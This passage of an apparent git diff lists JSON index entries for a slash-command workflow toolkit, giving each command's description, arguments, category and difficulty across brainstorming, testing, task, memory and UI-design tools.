"source": "../../../commands/workflow/tools/task-generate-tdd.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-coverage-analysis",
|
||||
"command": "/workflow:tools:tdd-coverage-analysis",
|
||||
"description": "Analyze test coverage and TDD cycle execution with Red-Green-Refactor compliance verification",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/tdd-coverage-analysis.md"
|
||||
},
|
||||
{
|
||||
"name": "test-concept-enhanced",
|
||||
"command": "/workflow:tools:test-concept-enhanced",
|
||||
"description": "Coordinate test analysis workflow using cli-execution-agent to generate test strategy via Gemini",
|
||||
"arguments": "--session WFS-test-session-id --context path/to/test-context-package.json",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-concept-enhanced.md"
|
||||
},
|
||||
{
|
||||
"name": "test-context-gather",
|
||||
"command": "/workflow:tools:test-context-gather",
|
||||
"description": "Collect test coverage context using test-context-search-agent and package into standardized test-context JSON",
|
||||
"arguments": "--session WFS-test-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-context-gather.md"
|
||||
},
|
||||
{
|
||||
"name": "test-task-generate",
|
||||
"command": "/workflow:tools:test-task-generate",
|
||||
"description": "Generate test planning documents (IMPL_PLAN.md, test task JSONs, TODO_LIST.md) using action-planning-agent - produces test planning artifacts, does NOT execute tests",
|
||||
"arguments": "--session WFS-test-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-task-generate.md"
|
||||
}
|
||||
],
|
||||
"ui-design": [
|
||||
{
|
||||
"name": "animation-extract",
|
||||
"command": "/workflow:ui-design:animation-extract",
|
||||
"description": "Extract animation and transition patterns from prompt inference and image references for design system documentation",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--focus \"<types>\"] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/animation-extract.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:codify-style",
|
||||
"command": "/workflow:ui-design:codify-style",
|
||||
"description": "Orchestrator to extract styles from code and generate shareable reference package with preview (automatic file discovery)",
|
||||
"arguments": "<path> [--package-name <name>] [--output-dir <path>] [--overwrite]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/codify-style.md"
|
||||
},
|
||||
{
|
||||
"name": "design-sync",
|
||||
"command": "/workflow:ui-design:design-sync",
|
||||
"description": "Synchronize finalized design system references to brainstorming artifacts, preparing them for /workflow:plan consumption",
|
||||
"arguments": "--session <session_id> [--selected-prototypes \"<list>\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/design-sync.md"
|
||||
},
|
||||
{
|
||||
"name": "explore-auto",
|
||||
"command": "/workflow:ui-design:explore-auto",
|
||||
"description": "Interactive exploratory UI design workflow with style-centric batch generation, creates design variants from prompts/images with parallel execution and user selection",
|
||||
"arguments": "[--input \"<value>\"] [--targets \"<list>\"] [--target-type \"page|component\"] [--session <id>] [--style-variants <count>] [--layout-variants <count>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/explore-auto.md"
|
||||
},
|
||||
{
|
||||
"name": "generate",
|
||||
"command": "/workflow:ui-design:generate",
|
||||
"description": "Assemble UI prototypes by combining layout templates with design tokens (default animation support), pure assembler without new content generation",
|
||||
"arguments": "[--design-id <id>] [--session <id>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/generate.md"
|
||||
},
|
||||
{
|
||||
"name": "imitate-auto",
|
||||
"command": "/workflow:ui-design:imitate-auto",
|
||||
"description": "UI design workflow with direct code/image input for design token extraction and prototype generation",
|
||||
"arguments": "[--input \"<value>\"] [--session <id>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/imitate-auto.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:import-from-code",
|
||||
"command": "/workflow:ui-design:import-from-code",
|
||||
"description": "Import design system from code files (CSS/JS/HTML/SCSS) with automatic file discovery and parallel agent analysis",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--source <path>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/import-from-code.md"
|
||||
},
|
||||
{
|
||||
"name": "layout-extract",
|
||||
"command": "/workflow:ui-design:layout-extract",
|
||||
"description": "Extract structural layout information from reference images or text prompts using Claude analysis with variant generation or refinement mode",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--targets \"<list>\"] [--variants <count>] [--device-type <desktop|mobile|tablet|responsive>] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/layout-extract.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:reference-page-generator",
|
||||
"command": "/workflow:ui-design:reference-page-generator",
|
||||
"description": "Generate multi-component reference pages and documentation from design run extraction",
|
||||
"arguments": "[--design-run <path>] [--package-name <name>] [--output-dir <path>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/reference-page-generator.md"
|
||||
},
|
||||
{
|
||||
"name": "style-extract",
|
||||
"command": "/workflow:ui-design:style-extract",
|
||||
"description": "Extract design style from reference images or text prompts using Claude analysis with variant generation or refinement mode",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--variants <count>] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/style-extract.md"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
@@ -1,896 +0,0 @@
{
|
||||
"general": [
|
||||
{
|
||||
"name": "cli-init",
|
||||
"command": "/cli:cli-init",
|
||||
"description": "Generate .gemini/ and .qwen/ config directories with settings.json and ignore files based on workspace technology detection",
|
||||
"arguments": "[--tool gemini|qwen|all] [--output path] [--preview]",
|
||||
"category": "cli",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/cli/cli-init.md"
|
||||
},
|
||||
{
|
||||
"name": "enhance-prompt",
|
||||
"command": "/enhance-prompt",
|
||||
"description": "Enhanced prompt transformation using session memory and intent analysis with --enhance flag detection",
|
||||
"arguments": "user input to enhance",
|
||||
"category": "general",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/enhance-prompt.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:discover",
|
||||
"command": "/issue:discover",
|
||||
"description": "Discover potential issues from multiple perspectives (bug, UX, test, quality, security, performance, maintainability, best-practices) using CLI explore. Supports Exa external research for security and best-practices perspectives.",
|
||||
"arguments": "<path-pattern> [--perspectives=bug,ux,...] [--external]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/discover.md"
|
||||
},
|
||||
{
|
||||
"name": "new",
|
||||
"command": "/issue:new",
|
||||
"description": "Create structured issue from GitHub URL or text description",
|
||||
"arguments": "<github-url | text-description> [--priority 1-5]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/new.md"
|
||||
},
|
||||
{
|
||||
"name": "queue",
|
||||
"command": "/issue:queue",
|
||||
"description": "Form execution queue from bound solutions using issue-queue-agent (solution-level)",
|
||||
"arguments": "[--rebuild] [--issue <id>]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/queue.md"
|
||||
},
|
||||
{
|
||||
"name": "compact",
|
||||
"command": "/memory:compact",
|
||||
"description": "Compact current session memory into structured text for session recovery, extracting objective/plan/files/decisions/constraints/state, and save via MCP core_memory tool",
|
||||
"arguments": "[optional: session description]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/compact.md"
|
||||
},
|
||||
{
|
||||
"name": "load",
|
||||
"command": "/memory:load",
|
||||
"description": "Delegate to universal-executor agent to analyze project via Gemini/Qwen CLI and return JSON core content package for task context",
|
||||
"arguments": "[--tool gemini|qwen] \\\"task context description\\",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load.md"
|
||||
},
|
||||
{
|
||||
"name": "tech-research-rules",
|
||||
"command": "/memory:tech-research-rules",
|
||||
"description": "3-phase orchestrator: extract tech stack → Exa research → generate path-conditional rules (auto-loaded by Claude Code)",
|
||||
"arguments": "[session-id | tech-stack-name] [--regenerate] [--tool <gemini|qwen>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/tech-research-rules.md"
|
||||
},
|
||||
{
|
||||
"name": "update-full",
|
||||
"command": "/memory:update-full",
|
||||
"description": "Update all CLAUDE.md files using layer-based execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
|
||||
"arguments": "[--tool gemini|qwen|codex] [--path <directory>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-full.md"
|
||||
},
|
||||
{
|
||||
"name": "update-related",
|
||||
"command": "/memory:update-related",
|
||||
"description": "Update CLAUDE.md for git-changed modules using batched agent execution (4 modules/agent) with gemini→qwen→codex fallback, <15 modules uses direct execution",
|
||||
"arguments": "[--tool gemini|qwen|codex]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-related.md"
|
||||
},
|
||||
{
|
||||
"name": "version",
|
||||
"command": "/version",
|
||||
"description": "Display Claude Code version information and check for updates",
|
||||
"arguments": "",
|
||||
"category": "general",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Beginner",
|
||||
"source": "../../../commands/version.md"
|
||||
},
|
||||
{
|
||||
"name": "artifacts",
|
||||
"command": "/workflow:brainstorm:artifacts",
|
||||
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
|
||||
"arguments": "topic or challenge description [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/artifacts.md"
|
||||
},
|
||||
{
|
||||
"name": "auto-parallel",
|
||||
"command": "/workflow:brainstorm:auto-parallel",
|
||||
"description": "Parallel brainstorming automation with dynamic role selection and concurrent execution across multiple perspectives",
|
||||
"arguments": "topic or challenge description\" [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
|
||||
},
|
||||
{
|
||||
"name": "data-architect",
|
||||
"command": "/workflow:brainstorm:data-architect",
|
||||
"description": "Generate or update data-architect/analysis.md addressing guidance-specification discussion points for data architecture perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/data-architect.md"
|
||||
},
|
||||
{
|
||||
"name": "product-manager",
|
||||
"command": "/workflow:brainstorm:product-manager",
|
||||
"description": "Generate or update product-manager/analysis.md addressing guidance-specification discussion points for product management perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/product-manager.md"
|
||||
},
|
||||
{
|
||||
"name": "product-owner",
|
||||
"command": "/workflow:brainstorm:product-owner",
|
||||
"description": "Generate or update product-owner/analysis.md addressing guidance-specification discussion points for product ownership perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/product-owner.md"
|
||||
},
|
||||
{
|
||||
"name": "scrum-master",
|
||||
"command": "/workflow:brainstorm:scrum-master",
|
||||
"description": "Generate or update scrum-master/analysis.md addressing guidance-specification discussion points for Agile process perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/scrum-master.md"
|
||||
},
|
||||
{
|
||||
"name": "subject-matter-expert",
|
||||
"command": "/workflow:brainstorm:subject-matter-expert",
|
||||
"description": "Generate or update subject-matter-expert/analysis.md addressing guidance-specification discussion points for domain expertise perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/subject-matter-expert.md"
|
||||
},
|
||||
{
|
||||
"name": "synthesis",
|
||||
"command": "/workflow:brainstorm:synthesis",
|
||||
"description": "Clarify and refine role analyses through intelligent Q&A and targeted updates with synthesis agent",
|
||||
"arguments": "[optional: --session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/synthesis.md"
|
||||
},
|
||||
{
|
||||
"name": "system-architect",
|
||||
"command": "/workflow:brainstorm:system-architect",
|
||||
"description": "Generate or update system-architect/analysis.md addressing guidance-specification discussion points for system architecture perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/system-architect.md"
|
||||
},
|
||||
{
|
||||
"name": "ux-expert",
|
||||
"command": "/workflow:brainstorm:ux-expert",
|
||||
"description": "Generate or update ux-expert/analysis.md addressing guidance-specification discussion points for UX perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/ux-expert.md"
|
||||
},
|
||||
{
|
||||
"name": "clean",
|
||||
"command": "/workflow:clean",
|
||||
"description": "Intelligent code cleanup with mainline detection, stale artifact discovery, and safe execution",
|
||||
"arguments": "[--dry-run] [\\\"focus area\\\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/clean.md"
|
||||
},
|
||||
{
|
||||
"name": "debug",
|
||||
"command": "/workflow:debug",
|
||||
"description": "Interactive hypothesis-driven debugging with NDJSON logging, iterative until resolved",
|
||||
"arguments": "\\\"bug description or error message\\",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/debug.md"
|
||||
},
|
||||
{
|
||||
"name": "init",
|
||||
"command": "/workflow:init",
|
||||
"description": "Initialize project-level state with intelligent project analysis using cli-explore-agent",
|
||||
"arguments": "[--regenerate]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/init.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-fix",
|
||||
"command": "/workflow:lite-fix",
|
||||
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
|
||||
"arguments": "[--hotfix] \\\"bug description or issue reference\\",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "list",
|
||||
"command": "/workflow:session:list",
|
||||
"description": "List all workflow sessions with status filtering, shows session metadata and progress information",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Beginner",
|
||||
"source": "../../../commands/workflow/session/list.md"
|
||||
},
|
||||
{
|
||||
"name": "solidify",
|
||||
"command": "/workflow:session:solidify",
|
||||
"description": "Crystallize session learnings and user-defined constraints into permanent project guidelines",
|
||||
"arguments": "[--type <convention|constraint|learning>] [--category <category>] \\\"rule or insight\\",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/solidify.md"
|
||||
},
|
||||
{
|
||||
"name": "start",
|
||||
"command": "/workflow:session:start",
|
||||
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
|
||||
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/start.md"
|
||||
},
|
||||
{
|
||||
"name": "conflict-resolution",
|
||||
"command": "/workflow:tools:conflict-resolution",
|
||||
"description": "Detect and resolve conflicts between plan and existing codebase using CLI-powered analysis with Gemini/Qwen",
|
||||
"arguments": "--session WFS-session-id --context path/to/context-package.json",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/conflict-resolution.md"
|
||||
},
|
||||
{
|
||||
"name": "gather",
|
||||
"command": "/workflow:tools:gather",
|
||||
"description": "Intelligently collect project context using context-search-agent based on task description, packages into standardized JSON",
|
||||
"arguments": "--session WFS-session-id \\\"task description\\",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/context-gather.md"
|
||||
},
|
||||
{
|
||||
"name": "animation-extract",
|
||||
"command": "/workflow:ui-design:animation-extract",
|
||||
"description": "Extract animation and transition patterns from prompt inference and image references for design system documentation",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--focus \"<types>\"] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/animation-extract.md"
|
||||
},
|
||||
{
|
||||
"name": "explore-auto",
|
||||
"command": "/workflow:ui-design:explore-auto",
|
||||
"description": "Interactive exploratory UI design workflow with style-centric batch generation, creates design variants from prompts/images with parallel execution and user selection",
|
||||
"arguments": "[--input \"<value>\"] [--targets \"<list>\"] [--target-type \"page|component\"] [--session <id>] [--style-variants <count>] [--layout-variants <count>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/explore-auto.md"
|
||||
},
|
||||
{
|
||||
"name": "imitate-auto",
|
||||
"command": "/workflow:ui-design:imitate-auto",
|
||||
"description": "UI design workflow with direct code/image input for design token extraction and prototype generation",
|
||||
"arguments": "[--input \"<value>\"] [--session <id>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/imitate-auto.md"
|
||||
},
|
||||
{
|
||||
"name": "layout-extract",
|
||||
"command": "/workflow:ui-design:layout-extract",
|
||||
"description": "Extract structural layout information from reference images or text prompts using Claude analysis with variant generation or refinement mode",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--targets \"<list>\"] [--variants <count>] [--device-type <desktop|mobile|tablet|responsive>] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/layout-extract.md"
|
||||
},
|
||||
{
|
||||
"name": "style-extract",
|
||||
"command": "/workflow:ui-design:style-extract",
|
||||
"description": "Extract design style from reference images or text prompts using Claude analysis with variant generation or refinement mode",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--variants <count>] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/style-extract.md"
|
||||
}
|
||||
],
|
||||
"implementation": [
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/issue:execute",
|
||||
"description": "Execute queue with codex using DAG-based parallel orchestration (solution-level)",
|
||||
"arguments": "[--worktree] [--queue <queue-id>]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "create",
|
||||
"command": "/task:create",
|
||||
"description": "Generate task JSON from natural language description with automatic file pattern detection, scope inference, and dependency analysis",
|
||||
"arguments": "\\\"task title\\",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/create.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/task:execute",
|
||||
"description": "Execute task JSON using appropriate agent (@doc-generator/@implementation-agent/@test-agent) with pre-analysis context loading and status tracking",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/workflow:execute",
|
||||
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
|
||||
"arguments": "[--resume-session=\\\"session-id\\\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-execute",
|
||||
"command": "/workflow:lite-execute",
|
||||
"description": "Execute tasks based on in-memory plan, prompt description, or file content",
|
||||
"arguments": "[--in-memory] [\\\"task description\\\"|file-path]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "test-cycle-execute",
|
||||
"command": "/workflow:test-cycle-execute",
|
||||
"description": "Execute test-fix workflow with dynamic task generation and iterative fix cycles until test pass rate >= 95% or max iterations reached. Uses @cli-planning-agent for failure analysis and task generation.",
|
||||
"arguments": "[--resume-session=\\\"session-id\\\"] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-cycle-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "task-generate-agent",
|
||||
"command": "/workflow:tools:task-generate-agent",
|
||||
"description": "Generate implementation plan documents (IMPL_PLAN.md, task JSONs, TODO_LIST.md) using action-planning-agent - produces planning artifacts, does NOT execute code implementation",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/task-generate-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "task-generate-tdd",
|
||||
"command": "/workflow:tools:task-generate-tdd",
|
||||
"description": "Autonomous TDD task generation using action-planning-agent with Red-Green-Refactor cycles, test-first structure, and cycle validation",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/task-generate-tdd.md"
|
||||
},
|
||||
{
|
||||
"name": "test-task-generate",
|
||||
"command": "/workflow:tools:test-task-generate",
|
||||
"description": "Generate test planning documents (IMPL_PLAN.md, test task JSONs, TODO_LIST.md) using action-planning-agent - produces test planning artifacts, does NOT execute tests",
|
||||
"arguments": "--session WFS-test-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-task-generate.md"
|
||||
},
|
||||
{
|
||||
"name": "generate",
|
||||
"command": "/workflow:ui-design:generate",
|
||||
"description": "Assemble UI prototypes by combining layout templates with design tokens (default animation support), pure assembler without new content generation",
|
||||
"arguments": "[--design-id <id>] [--session <id>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/generate.md"
|
||||
}
|
||||
],
|
||||
"planning": [
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/issue:plan",
|
||||
"description": "Batch plan issue resolution using issue-plan-agent (explore + plan closed-loop)",
|
||||
"arguments": "--all-pending <issue-id>[,<issue-id>,...] [--batch-size 3] ",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "breakdown",
|
||||
"command": "/task:breakdown",
|
||||
"description": "Decompose complex task into subtasks with dependency mapping, creates child task JSONs with parent references and execution order",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/breakdown.md"
|
||||
},
|
||||
{
|
||||
"name": "replan",
|
||||
"command": "/task:replan",
|
||||
"description": "Update task JSON with new requirements or batch-update multiple tasks from verification report, tracks changes in task-changes.json",
|
||||
"arguments": "task-id [\\\"text\\\"|file.md] | --batch [verification-report.md]",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/replan.md"
|
||||
},
|
||||
{
|
||||
"name": "action-plan-verify",
|
||||
"command": "/workflow:action-plan-verify",
|
||||
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
|
||||
"arguments": "[optional: --session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/action-plan-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "api-designer",
|
||||
"command": "/workflow:brainstorm:api-designer",
|
||||
"description": "Generate or update api-designer/analysis.md addressing guidance-specification discussion points for API design perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
